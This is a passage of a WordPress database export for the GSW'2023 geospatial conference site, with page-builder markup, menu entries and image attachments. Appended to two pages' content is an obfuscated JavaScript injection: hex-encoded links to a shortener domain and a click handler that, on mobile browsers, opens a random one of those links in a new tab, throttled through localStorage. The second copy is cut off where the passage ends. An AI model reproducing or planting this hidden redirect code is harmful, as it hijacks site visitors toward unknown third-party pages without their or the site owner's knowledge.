main_heading_font_size=\"desktop:28px;\" main_heading_line_height=\"desktop:38px;\" main_heading_margin=\"margin-bottom:30px;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" main_heading_style=\"font-weight:300;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fthe7.io%2Fold-landing%2Fmain%2Fmore%2Freal-life-showcase%2F||target:%20_blank|\" icon_type=\"picker\" icon_picker=\"dt-icon-the7-misc-006-1\" css=\".vc_custom_1587577448404{margin-right: 5px !important;margin-bottom: 5px !important;margin-left: 5px !important;}\"]Real-life showcase[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fthemeforest.net%2Fitem%2Fthe7-responsive-multipurpose-wordpress-theme%2Freviews%2F5556590%3Futf8%3D%E2%9C%93%26reviews_controls%255Bsort%255D%3Dratings_descending||target:%20_blank|\" icon_type=\"picker\" icon_picker=\"icomoon-the7-font-the7-comment-00\" css=\".vc_custom_1587577444257{margin-top: 0px !important;margin-right: 5px !important;margin-bottom: 5px !important;margin-left: 5px !important;}\"]Latest reviews[/dt_default_button][/vc_column][/vc_row][vc_row full_width=\"stretch_row\" bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^411|url^https://gsw2023.com/wp-content/uploads/2016/11/bg-blur.jpg|caption^null|alt^null|title^bg-blur|description^null\" bg_image_repeat=\"no-repeat\" bg_override=\"ex-full\" type=\"vc_default\" css=\".vc_custom_1480112480376{padding-top: 60px !important;padding-bottom: 60px !important;background-color: #0f1217 !important;}\"][vc_column][ultimate_heading main_heading=\"Discover the world of The7 –\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" main_heading_font_size=\"desktop:48px;tablet:42px;mobile_landscape:36px;\" main_heading_line_height=\"desktop:58px;tablet:52px;mobile_landscape:46px;\" sub_heading_font_size=\"desktop:28px;tablet:26px;mobile_landscape:24px;\" sub_heading_line_height=\"desktop:38px;tablet:36px;mobile_landscape:34px;\" main_heading_margin=\"margin-bottom:15px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" main_heading_style=\"font-weight:300;\" sub_heading_style=\"font-weight:300;\" sub_heading_margin=\"margin-bottom:35px;\"]the world of creating pro-grade websites without writing a single line of code![/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fthemeforest.net%2Fitem%2Fthe7-responsive-multipurpose-wordpress-theme%2F5556590%3Fref%3DDream-Theme%26license%3Dregular%26open_purchase_for_item_id%3D5556590||target:%20_blank|\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" button_alignment=\"btn_center\" icon_type=\"picker\" icon_picker=\"icomoon-the7-font-icon-cart-detailed\" icon_gap=\"12px\"]Buy The7 now[/dt_default_button][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Landing','','publish','closed','open','','landing','','','2016-11-14 16:30:30','2016-11-14 16:30:30','',0,'https://the7.io/old-landing/new-landing/?page_id=2',0,'page','',0),
(2151,1,'2022-10-04 00:04:30','2022-10-04 00:04:30','','Main Demo','','publish','closed','closed','','main-demo-2','','','2022-10-04 00:04:30','2022-10-04 00:04:30','',0,'https://gsw2023.com/index.php/2022/10/04/main-demo-2/',1,'nav_menu_item','',0),
(2152,1,'2022-10-04 00:04:30','2022-10-04 00:04:30','','Pre-Built Websites','','publish','closed','closed','','pre-built-websites-2','','','2022-10-04 00:04:30','2022-10-04 00:04:30','',0,'https://gsw2023.com/index.php/2022/10/04/pre-built-websites-2/',2,'nav_menu_item','',0),
(2153,1,'2022-10-04 00:04:30','2022-10-04 00:04:30','','Features','','publish','closed','closed','','features-2','','','2022-10-04 00:04:30','2022-10-04 00:04:30','',0,'https://gsw2023.com/index.php/2022/10/04/features-2/',3,'nav_menu_item','',0),
(2154,1,'2020-03-23 13:38:43','2020-03-23 13:38:43','','crminel-demo','','inherit','closed','closed','','crminel-demo','','','2020-03-23 13:38:43','2020-03-23 13:38:43','',0,'https://gsw2023.com/wp-content/uploads/2020/03/crminel-demo.jpg',0,'attachment','image/jpeg',0),
(2155,1,'2020-05-18 16:45:32','2020-05-18 15:45:32','','store-fashion','','inherit','open','closed','','store-fashion','','','2020-05-18 16:45:32','2020-05-18 15:45:32','',0,'https://gsw2023.com/wp-content/uploads/2020/05/store-fashion.jpg',0,'attachment','image/jpeg',0),
(2156,1,'2020-05-20 08:48:21','2020-05-20 07:48:21','','im-biz-cons','','inherit','open','closed','','im-biz-cons','','','2020-05-20 08:48:21','2020-05-20 07:48:21','',0,'https://gsw2023.com/wp-content/uploads/2020/01/im-biz-cons.jpg',0,'attachment','image/jpeg',0),
(2157,1,'2020-05-22 14:14:54','2020-05-22 13:14:54','','store-rev-home','','inherit','open','closed','','store-rev-home','','','2020-05-22 14:14:54','2020-05-22 13:14:54','',0,'https://gsw2023.com/wp-content/uploads/2020/05/store-rev-home.jpg',0,'attachment','image/jpeg',0),
(2158,1,'2021-06-07 13:30:32','2021-06-07 12:30:32','','woocommerce-placeholder','','inherit','open','closed','','woocommerce-placeholder','','','2021-06-07 13:30:32','2021-06-07 12:30:32','',0,'https://gsw2023.com/wp-content/uploads/2021/06/woocommerce-placeholder.png',0,'attachment','image/png',0),
(2167,1,'2016-02-07 10:02:23','2016-02-07 10:02:23','[vc_row equal_height=\"no\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let 